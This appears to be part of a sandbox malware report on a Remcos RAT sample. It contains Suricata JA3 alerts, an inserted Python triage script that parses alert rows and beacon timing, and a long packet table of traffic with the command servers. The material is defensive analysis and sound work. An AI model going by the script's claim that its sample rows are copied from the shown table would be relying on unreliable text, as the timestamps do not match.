2024-12-16T17:34:26.009269+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50084 | 107.173.4.162560 | TCP
2024-12-16T17:34:28.541837+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50085 | 107.173.4.162560 | TCP
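The alert rows above are what the page extraction left of the Suricata table: every column run together with no delimiter. The following is an added example, not part of the Joe Sandbox report, showing how a triage script can recover the unambiguous fields (timestamp, SID, signature, severity, source IP and source port), compute the inter-alert spacing that exposes the roughly three-second Remcos beacon cadence, and, for the destination IP and port, enumerate every valid split of the fused digit run instead of guessing one. It assumes the analysis VM address 192.168.2.4 (taken from the packet table on this page) and that the Windows ephemeral source ports are five digits; the five sample rows are copied from the table above.

```python
import re
from datetime import datetime
from statistics import mean

# Five Suricata alert rows copied from the report's table, exactly as the
# page extraction flattened them (all columns run together, no delimiter).
ROWS = [
    "2024-12-16T17:30:59.594117+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449744107.173.4.162560TCP",
    "2024-12-16T17:31:02.738356+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449745107.173.4.162560TCP",
    "2024-12-16T17:31:05.840521+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449746107.173.4.162560TCP",
    "2024-12-16T17:31:08.903925+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449747107.173.4.162560TCP",
    "2024-12-16T17:31:12.005673+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449748107.173.4.162560TCP",
]

# Assumption: the analysis VM address, read from the packet table of the same
# report. Anchoring on it removes the guesswork about where the source IP ends.
SANDBOX_HOST = "192.168.2.4"

ROW_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{6}[+-]\d{4})"  # ISO timestamp
    r"(?P<sid>\d{7})"                  # seven-digit ET rule SID, as in this report
    r"(?P<sig>.*?)"                    # signature text, shortest match
    r"(?P<sev>[1-4])"                  # Suricata priority 1..4
    + re.escape(SANDBOX_HOST)
    + r"(?P<sport>\d{5})"              # assumption: Windows ephemeral port, five digits
    r"(?P<dst>\d.*?)"                  # destination IP and port, still fused
    r"(?P<proto>TCP|UDP)$"
)

OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"


def candidate_endpoints(fused: str) -> list[tuple[str, int]]:
    """Enumerate every cut of a fused 'IPport' run that yields a valid dotted
    quad and a port in 1..65535. More than one result means the flattened
    text is ambiguous and must not be resolved by picking a favourite."""
    found = []
    for cut in range(7, len(fused)):            # "1.1.1.1" is the shortest IP
        ip, port = fused[:cut], fused[cut:]
        if not re.fullmatch(rf"{OCTET}(?:\.{OCTET}){{3}}", ip):
            continue
        if not port.isdigit() or port[0] == "0" or not 1 <= int(port) <= 65535:
            continue
        found.append((ip, int(port)))
    return found


def parse_row(row: str) -> dict:
    """Split one flattened row into typed fields; the destination stays a
    candidate list because the text does not fix its IP/port boundary."""
    m = ROW_RE.match(row)
    if m is None:
        raise ValueError(f"row does not match the expected layout: {row!r}")
    g = m.groupdict()
    return {
        "ts": datetime.strptime(g["ts"], "%Y-%m-%dT%H:%M:%S.%f%z"),
        "sid": int(g["sid"]),
        "signature": g["sig"],
        "severity": int(g["sev"]),
        "src_ip": SANDBOX_HOST,
        "src_port": int(g["sport"]),
        "dst_candidates": candidate_endpoints(g["dst"]),
        "proto": g["proto"],
    }


def beacon_gaps(rows: list[str]) -> list[float]:
    """Seconds between consecutive alerts. A tight, near-constant spread is
    the beaconing cadence that a single JA3 hit does not show on its own."""
    alerts = sorted((parse_row(r) for r in rows), key=lambda a: a["ts"])
    return [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(alerts, alerts[1:])]


def summarise(rows: list[str]) -> dict:
    """Triage summary: alert count, rule SIDs, port behaviour, beacon spacing
    and whether the destination column needs the original HTML to resolve."""
    alerts = [parse_row(r) for r in rows]
    gaps = beacon_gaps(rows)
    return {
        "alerts": len(alerts),
        "sids": sorted({a["sid"] for a in alerts}),
        # a fresh, increasing ephemeral port per alert: one new TLS connection each time
        "src_ports_increasing": all(
            a["src_port"] < b["src_port"] for a, b in zip(alerts, alerts[1:])
        ),
        "gap_min_s": round(min(gaps), 2),
        "gap_mean_s": round(mean(gaps), 2),
        "gap_max_s": round(max(gaps), 2),
        # more than one candidate split means the fused text is ambiguous
        "dst_ambiguous": any(len(a["dst_candidates"]) != 1 for a in alerts),
    }


if __name__ == "__main__":
    for key, value in summarise(ROWS).items():
        print(f"{key}: {value}")
    print("destination candidates:", parse_row(ROWS[0])["dst_candidates"])
```

On the rows above the gaps cluster around 3.1 s and every alert uses a new, increasing source port, which is the short-interval reconnect pattern a JA3 rule on its own does not convey. The fused destination run 107.173.4.162560 admits three valid cuts (107.173.4.1:62560, 107.173.4.16:2560, 107.173.4.162:560), so the script reports the ambiguity rather than choosing; the original report HTML, or the malware configuration section, is the place to settle it.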
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 17:30:27.665678978 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:27.786505938 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:27.786592960 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:27.786887884 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:27.908534050 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.926110029 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.926193953 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:28.926609993 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.926624060 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.926673889 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:28.928529978 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.928543091 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.928586006 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:28.930706024 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.930726051 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.930780888 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:28.932929039 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.932941914 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.932986021 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:28.935069084 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:28.935117960 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.046210051 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.046322107 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.046761990 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.046818018 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.118520021 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.118596077 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.118858099 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.118940115 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.122484922 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.122665882 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.122900009 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.122962952 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.131454945 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.131525040 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.131819963 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.131881952 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.140064001 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.140125990 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.140655994 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.140708923 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.148106098 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.148168087 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.148514032 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.148564100 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.156697035 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.156758070 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.157135010 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.157186031 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.167500019 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.167512894 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.167578936 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.174343109 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.174408913 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.174715042 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.174773932 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.183232069 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.183306932 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.183557034 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.183608055 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.191365004 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.191385031 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.191438913 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.198519945 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.198589087 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.199023962 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.199081898 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.310645103 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.310723066 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.310926914 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.311084986 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.314357996 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.314403057 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.314691067 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.314739943 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.322101116 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.322149038 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.322508097 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.322556973 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.329653978 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.329730034 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.330054998 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.330233097 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.337405920 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.337465048 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.337783098 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.337836981 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.345057964 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.345112085 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.345482111 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.345535040 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.352750063 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.352819920 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.353100061 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.353149891 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.360394955 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.360472918 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.360887051 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.360948086 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.368042946 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.368119001 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.368463993 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.368520021 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.375741959 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.375828028 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.376142979 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.376197100 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.381911039 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.382014036 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.382245064 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.382297039 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.388000965 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.388072968 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.388385057 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.388441086 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.394133091 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.394210100 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.394546032 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.394598961 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.400264025 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.400341034 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.400671005 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.400727987 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.406512022 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.406606913 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.406939983 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.406996965 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.412797928 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.412902117 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.413240910 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.413305044 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.418747902 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.418826103 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.419159889 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.419214010 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.424832106 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.424895048 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.502994061 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.503242016 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.503341913 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.503398895 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.505848885 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.505906105 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.506356001 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
Dec 16, 2024 17:30:29.506409883 CET | 49730 | 80 | 192.168.2.4 | 192.3.179.166
Dec 16, 2024 17:30:29.511744022 CET | 80 | 49730 | 192.3.179.166 | 192.168.2.4
                                                                              Dec 16, 2024 17:30:29.511805058 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.512187004 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.512238026 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.517565966 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.517630100 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.517995119 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.518049002 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.523576975 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.523643970 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.524112940 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.524167061 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.528928041 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.529001951 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.529457092 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.529511929 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.534172058 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.534245014 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.534542084 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.534600019 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.539259911 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.539324045 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.539654970 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.539710045 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.545352936 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.545428038 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.545809031 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.545864105 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.550185919 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.550267935 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.550481081 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.550537109 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.554605007 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.554714918 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.555047035 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.555113077 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.559488058 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.559545040 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.559845924 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.559899092 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.564076900 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.564136982 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.564384937 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.564435005 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.568557978 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.568618059 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.569036007 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.569087029 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.573127031 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.573194027 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.573477030 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.573533058 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.577716112 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.577780962 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.578180075 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.578233004 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.580926895 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.580987930 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.581310034 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.581363916 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.585506916 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.585577011 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.585923910 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.585978985 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.592612028 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.592626095 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.592708111 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.595959902 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.596029997 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.596378088 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.596435070 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.600385904 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.600500107 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.600860119 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.600914955 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.603585005 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.603733063 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.604053020 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.604110003 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.608098984 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.608181953 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.608474016 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.608529091 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.612678051 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.612757921 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.613043070 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.613100052 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.617341042 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.617388964 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.617564917 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.617866039 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.621685982 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.621731997 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.622025967 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.622154951 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.626216888 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.626271009 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.626689911 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.626842976 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.630714893 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.630769968 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.631141901 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.631192923 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.635272980 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.635351896 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.635652065 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.635708094 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.639748096 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.639815092 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.695348978 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.695549011 CET4973080192.168.2.4192.3.179.166
